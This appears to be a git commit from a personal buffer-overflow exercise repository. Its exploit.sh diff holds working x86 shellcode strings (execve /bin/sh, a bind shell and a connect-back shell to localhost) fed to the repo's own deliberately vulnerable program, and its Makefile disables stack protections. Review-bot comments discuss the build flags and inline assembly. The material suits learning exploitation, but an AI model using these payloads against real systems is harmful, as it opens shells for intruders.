author | toni <matzeton@googlemail.com> | 2016-07-19 16:22:57 +0200 |
---|---|---|
committer | toni <matzeton@googlemail.com> | 2016-07-19 16:22:57 +0200 |
commit | bd131dc1d623c0708619ec95c5ece591e3462e89 (patch) | |
tree | 8854cc6752b398be737de175f911c8c92271a3f9 | |
parent | 16faa81d6f5e18669fce4cfb71fa771e8d80bf90 (diff) | |
parent | 5776888c1bf385138f8e87dd62688018ddca4f57 (diff) |
Merge branch 'master' of github.com:lnslbrty/bufflow
-rw-r--r-- | .gitignore | 1 | ||||
-rw-r--r-- | Makefile | 2 | ||||
-rwxr-xr-x | exploit.sh | 6 | ||||
-rw-r--r-- | funcjmp_ext_x86.c | 40 | ||||
-rw-r--r-- | funcjmp_simple.c | 1 |
5 files changed, 20 insertions, 30 deletions
@@ -8,3 +8,4 @@ sc-test
 sc-test_x64
 funcjmp_simple
 funcjmp_ext
+format
@@ -5,7 +5,7 @@ CC := gcc
 STRIP := strip
 LBITS := $(shell getconf LONG_BIT)
 CFLAGS += -Wall
-OCFLAGS += -z execstack -fno-stack-protector
+OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
 SOURCES = $(wildcard *.c)
@@ -14,7 +14,7 @@ if [ "$1" = "local" ]; then
 if [ $(getconf LONG_BIT) -eq 32 ]; then
 # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
 # uses own shellcode: shellcode/hello.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'`
+ ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\xc4\xf2\xff\xbf"'`
 else
 # 133xNOP + shellcode(34) + 145xNOP + return addr
 # uses own shellcode: shellcode/execve_x64.o
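Review bot: The new OCFLAGS line switches off every hardening the toolchain enables by default (`-zexecstack -znorelro -fno-stack-protector -fno-pie`) and adds `-static -ggdb`, but nothing in the Makefile records that this is deliberate, so anyone reusing it for another target inherits a fully unprotected build. A comment above the line would make the intent explicit, e.g. `# OCFLAGS: deliberately disables NX, RELRO, stack canaries and PIE for the lab binaries only; never reuse for anything deployed`. How OCFLAGS is applied is outside the hunk; if it reaches every target built from `SOURCES = $(wildcard *.c)`, the non-exercise tools (such as the new `format` binary listed in .gitignore) get the same flags. `-static` combined with `-m32` also presumably needs the 32-bit static libc present, which the build does not check.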
@@ -24,7 +24,7 @@ elif [ "$1" = "bind" ]; then
 if [ $(getconf LONG_BIT) -eq 32 ]; then
 # 85xNOP + shellcode(134) + 85xNOP + return addr
 # uses own shellcode: shellcode/socket.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'`
+ ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
 else
 # 100xNOP + shellcode(149) + 63xNOP + return addr
 # uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
@@ -34,7 +34,7 @@ elif [ "$1" = "connect" ]; then
 if [ $(getconf LONG_BIT) -eq 32 ]; then
 # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
 # uses own shellcode: shellcode/connect.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\x12\xf4\xff\xbf"'`
+ ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
 fi
 else
 $0
diff --git a/funcjmp_ext_x86.c b/funcjmp_ext_x86.c
index 6174bec..9bf20f4 100644
--- a/funcjmp_ext_x86.c
+++ b/funcjmp_ext_x86.c
@@ -5,48 +5,36 @@
 #define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \
 asm volatile(_asm_str); \
 asm volatile(".att_syntax prefix");
-#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void)
-#define JMP_FUNC_DECL(func) void *fptr = (void *)( &func );
-#define JMP_TO_FUNC \
- INTEL_ASM(" \
- call getip; \
- jmp short donext; \
- cfunc: \
- mov eax,[fptr]; \
- add eax,0x0; \
- jmp eax; \
- ret; \
- getip: \
- nop; \
- jmp short cfunc; \
- donext: \
- ");
-
-#define PRE_JUMP(arg)
-
 int hookable(char *arg0, int arg1, int arg2)
 {
 asm("label:");
- INTEL_ASM("nop; nop; nop; pop eax; pop eax");
+ INTEL_ASM("nop; nop; nop");
+ printf("hookable ..\n");
+ asm("nop; nop; nop; pop %ebx; pop %eax; call *%eax; call *%ebx");
 asm("jmp end");
 return 0;
 }
-int testfkt(void *param)
+int testfkt(void)
 {
 printf("Subroutine ..\n");
+ return 0;
+}
+
+void testfkt2(void)
+{
+ printf("another Subroutine ..\n");
 }
 int main(int argc, char **argv)
 {
- asm("push %0" : : "m" (hookable));
- asm("push %0" : : "g" (hookable));
+ printf("main(...)\n");
+ asm("push %0" : : "g" (testfkt));
+ asm("push %0" : : "g" (testfkt2));
 asm("jmp label; \
 end:");
- //hookable(NULL, 0x8, 0x9);
- printf("Hello World!\n");
- testfkt(NULL);
+ printf("EOF!\n");
 return 66;
 }
diff --git a/funcjmp_simple.c b/funcjmp_simple.c
index 9e756cf..63946c8 100644
--- a/funcjmp_simple.c
+++ b/funcjmp_simple.c
@@ -29,6 +29,7 @@
 JUMPABLE_FUNC(testfkt)
 {
 int var0 = 0x1, var1 = 0x2, var2 = 0x3;
 var0 += var1 + var2;
+ printf("Subroutine: %d = %d + %d\n", var0, var1, var2);
 return 0;
 }
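Review bot: The new `pop %ebx; pop %eax; call *%eax; call *%ebx` block in `hookable` relies on a stack layout the compiler knows nothing about: it assumes `main` pushed exactly two function pointers before `jmp label`, that the `printf("hookable ..\n")` now placed between `label:` and the pops leaves `%esp` where it found it, and it overwrites `%ebx`, which is callee-saved in the i386 ABI, with no clobber list. Because the function is entered through `jmp label` (skipping its prologue) and left through `jmp end` (skipping its epilogue), declaring clobbers would not rescue it, so the contract belongs in a comment above `hookable`: it must never be called normally, `main` must push exactly two callee addresses in the order they are to be called, and the trick depends on the `-m32 -fno-pie -static` build the Makefile sets. The `return 0;` after `asm("jmp end")` is unreachable, and with the commented-out direct call removed the `arg0`/`arg1`/`arg2` parameters are now unused, so they should either go or be documented as placeholders. The two `asm("push %0" : : "g" (...))` lines in `main` perform the matching undeclared stack manipulation and should carry the same warning.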